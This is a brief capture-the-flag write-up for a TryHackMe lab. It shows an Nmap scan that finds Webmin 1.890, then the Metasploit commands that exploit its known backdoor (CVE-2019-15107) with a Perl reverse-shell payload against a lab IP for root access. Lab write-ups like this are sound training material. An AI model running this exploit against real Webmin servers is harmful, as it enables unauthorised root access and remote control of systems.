Source

https://tryhackme.com/room/source

First I ran a Nmap scan, from which we see that port 22 and 10000 is open. We also see that port 10000 runs some web service called Webmin.

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b74cd0bde27b1b15722764562915ea23 (RSA)
|   256 b78523114f44fa22008e40775ecf287c (ECDSA)
|_  256 a9fe4b82bf893459365becdac2d395ce (ED25519)
10000/tcp open  http    MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5: 7B403D3D5C87B168EA5B8ADA089E342C
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

After looking through the webpage, which requires SSL (https), I search for known vulnerabilities in Webmin and found CVE-2019-15107. Metasploit has an exploit for this one which makes things very easy. I configured as such and got imidiate root access.

I don't think that was the intended way of doing thinks, but it worked very well.

msf6 > use exploit/linux/http/webmin_backdoor
[*] Using configured payload cmd/unix/reverse_perl

msf6 exploit(linux/http/webmin_backdoor) > set rhost 10.10.186.27
rhost => 10.10.186.27

msf6 exploit(linux/http/webmin_backdoor) > set lhost tun0
lhost => NOTSHOWN

msf6 exploit(linux/http/webmin_backdoor) > set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true

msf6 exploit(linux/http/webmin_backdoor) > run

Last updated